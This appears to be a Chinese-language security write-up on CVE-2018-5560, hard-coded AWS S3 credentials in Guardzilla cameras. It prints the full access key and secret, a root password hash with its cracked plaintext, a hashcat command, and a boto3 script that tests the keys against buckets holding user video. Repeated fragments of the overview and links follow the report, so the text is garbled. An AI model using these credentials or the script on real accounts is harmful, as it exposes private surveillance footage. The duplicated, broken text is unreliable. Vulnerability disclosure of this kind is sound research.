Guardzilla IoT摄像机硬编码凭证漏洞(CVE-2018-5560)分析报告<\/h1>

漏洞概述<\/h2>
CVE-2018-5560是Guardzilla Security Video System Model #: GZ521WB中存在的一个严重安全漏洞，涉及硬编码的Amazon S3凭证。该漏洞允许攻击者无需高级技术即可访问设备使用的所有S3存储桶，可能泄露敏感视频监控数据。<\/p>

受影响产品<\/h2>

Guardzilla All-In-One Video Security System<\/strong>（视频安全多合一系统）<\/li>
确认受影响的型号：GZ501W<\/li>

其他型号未测试，可能存在相同风险<\/li> <\/ul>
技术分析细节<\/h2>
1. 固件提取与分析<\/h3>
研究人员从设备芯片中提取出固件，发现包含以下文件系统：<\/p>

SquashFS文件系统<\/li>
Journaling Flash File System version 2 (JFFS2)文件系统<\/li> <\/ul>
通过分析发现固件由Faraday Corp开发：<\/p>
Copyright (C) 2005 Faraday Corp. www.faraday.com.tw <\/code><\/pre> 2. 硬编码凭证发现<\/h3> 2.1 管理员密码破解<\/h4> 在\/etc\/shadow<\/code>文件中发现root账号的DES加密密码：<\/p> root:MvynOwD449PkM:0:0:99999::: <\/code><\/pre> 使用hashcat成功破解密码：<\/p> hashcat -m 1500 -a 3 -o ..\/guardzilla.found -O -i --increment-min=8 --increment-max=12 -w 3 -t 50 ..\/guardzilla.hash ?a?a?a?a?a?a?a?a?a?a?a?a?a <\/code><\/pre> 破解结果<\/strong>：密码为GMANCIPC<\/code><\/p> 2.2 启动过程分析<\/h4> 设备启动时执行以下关键脚本和程序：<\/p> init<\/code>脚本启动boot.sh<\/code><\/li> boot.sh<\/code>启动： \/mnt\/mtd\/startapp<\/code><\/li> \/home\/daemon.exe<\/code><\/li> <\/ul> <\/li> startapp<\/code>资源启动： vg_boot.sh<\/code>（配置底层视频设置）<\/li> main.exe<\/code><\/li> <\/ul> <\/li> <\/ol> 3. AWS S3硬编码凭证<\/h3> 通过IDA Pro分析固件二进制文件，发现硬编码的AWS凭证：<\/p> Access Key<\/strong>: AKIAJQDP34RKL7GGV7OQ<\/code><\/li> Secret Access Key<\/strong>: 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<\/code><\/li> Hostname<\/strong>: s3-us-west-2.amazonaws.com<\/code><\/li> Bucket<\/strong>: motion-detection<\/code><\/li> <\/ul> 3.1 凭证验证脚本<\/h4> 使用Python脚本验证凭证有效性：<\/p> import<\/span> boto3 <\/span><\/span>s3 =<\/span> boto3.<\/span>client('s3'<\/span>, <\/span><\/span> aws_access_key_id=<\/span>'AKIAJQDP34RKL7GGV7OQ'<\/span>, <\/span><\/span> aws_secret_access_key=<\/span>'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'<\/span>, <\/span><\/span> region_name=<\/span>'us-west-1'<\/span>) <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> result =<\/span> s3.<\/span>list_buckets() <\/span><\/span> print(result) <\/span><\/span>except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> print(e) <\/span><\/span><\/code><\/pre>3.2 可访问的S3存储桶<\/h4> 凭证可访问的存储桶列表：<\/p> elasticbeanstalk-us-west-2-036770821135<\/li> facial-detection<\/li> free-video-storage<\/li> free-video-storage-persist<\/li> gz-rds-backups<\/li> gz-test-bucket<\/li> motion-detection<\/li> premium-video-storage<\/li> premium-video-storage-persist<\/li> rekognition-video-console-demo-cmh-guardzilla-2918n05v5rvh<\/li> setup-videos<\/li> wowza-test-bucket<\/li> <\/ol> 4. 权限分析<\/h3> 使用PACU AWS框架分析发现：<\/p> 凭证属于IAM用户motion-detection<\/code><\/li> 账户ID: 036770821135<\/code><\/li> 用户ID: AIDAJQRSLLW52U7GLHFYE<\/code><\/li> 无特定策略限制，具有广泛权限<\/li> <\/ul> 5. 其他安全问题<\/h3> 5.1 过期的OpenSSL库<\/h4> 固件中使用的是OpenSSL 1.0.1g，存在多个已知漏洞：<\/p> CVE-2016-0705 (双重释放漏洞)<\/li> CVE-2015-0292 (拒绝服务漏洞)<\/li> CVE-2014-8176 (内存破坏漏洞)<\/li> CVE-2016-0797 (空指针间接引用)<\/li> CVE-2015-0287 (内存破坏漏洞)<\/li> <\/ul> 5.2 网络通信分析<\/h4> 设备默认监听23端口(ipc login提示符)，并发送大量UDP流量到：<\/p> US-EAST-2 Amazon服务器<\/li> 特定HTTP请求示例： http:\/\/54.68.243.114\/apns\/apns.php?cmd=reg_server&uid=G1KEXWU2BPWHCFZ5111A http:\/\/54.68.243.114\/apns\/apns.php?cmd=raise_event&uid=G1KEXWU2BPWHCFZ5111A&event_type=1&event_time=1538239032 <\/code><\/pre> <\/li> <\/ul> 漏洞影响评估<\/h2> 数据泄露风险<\/strong>：攻击者可访问所有关联的S3存储桶，可能获取用户视频监控数据<\/li> 设备控制风险<\/strong>：通过硬编码密码可获取设备root权限<\/li> 中间人攻击风险<\/strong>：使用过期的OpenSSL库可能导致通信被拦截<\/li> 供应链攻击风险<\/strong>：所有使用相同固件的设备都存在相同漏洞<\/li> <\/ol> 修复建议<\/h2> 立即措施<\/strong>：<\/p> 更换所有AWS凭证<\/li> 审查S3存储桶访问日志<\/li> 更改设备默认密码<\/li> <\/ul> <\/li> 固件更新<\/strong>：<\/p> 移除硬编码凭证<\/li> 升级OpenSSL库到最新版本<\/li> 实现动态凭证获取机制<\/li> <\/ul> <\/li> 长期措施<\/strong>：<\/p> 实施安全开发生命周期(SDL)<\/li> 定期安全审计<\/li> 安全凭证管理最佳实践<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> 原始分析报告：https:\/\/www.0dayallday.org\/guardzilla-video-camera-hard-coded-aws-credentials\/<\/li> CVE详细信息：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-5560<\/li> <\/ul>

Guardzilla IoT摄像机硬编码凭证漏洞(CVE-2018-5560)分析报告<\/h1>

漏洞概述<\/h2> CVE-2018-5560是Guardzilla Security Video System Model #: GZ521WB中存在的一个严重安全漏洞，涉及硬编码的Amazon S3凭证。该漏洞允许攻击者无需高级技术即可访问设备使用的所有S3存储桶，可能泄露敏感视频监控数据。<\/p>

技术分析细节<\/h2>

2. 硬编码凭证发现<\/h3>

5. 其他安全问题<\/h3>

参考链接<\/h2> 原始分析报告：https:\/\/www.0dayallday.org\/guardzilla-video-camera-hard-coded-aws-credentials\/<\/li> CVE详细信息：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-5560<\/li> <\/ul>

漏洞概述<\/h2>
CVE-2018-5560是Guardzilla Security Video System Model #: GZ521WB中存在的一个严重安全漏洞，涉及硬编码的Amazon S3凭证。该漏洞允许攻击者无需高级技术即可访问设备使用的所有S3存储桶，可能泄露敏感视频监控数据。<\/p>

参考链接<\/h2>

原始分析报告：https:\/\/www.0dayallday.org\/guardzilla-video-camera-hard-coded-aws-credentials\/<\/li>
CVE详细信息：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-5560<\/li> <\/ul>